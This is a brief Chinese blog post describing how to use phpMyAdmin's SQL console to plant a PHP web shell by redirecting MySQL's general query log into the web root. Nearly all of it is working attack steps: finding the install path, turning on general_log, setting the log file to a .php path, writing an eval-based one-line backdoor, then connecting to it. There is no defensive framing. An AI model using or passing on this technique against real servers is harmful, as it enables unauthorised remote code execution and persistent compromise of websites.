进入phpmysql里面过够通过sql指令来获取mysql的目录,然后推断出网站路径
指令为 select @@basedir;
set global general_log = “ON”; #将日记保存状态开启
SET global general_log_file=’c:/phpStudy/phpstudy/WWW/1.php’ #修改日记的保存位置
然后写入一句话 select‘<?php @eval($_POST[password]);?>’
最后连接URL/1.php即可。
phpmyadmin通过日记提权
最新推荐文章于 2024-01-29 16:26:44 发布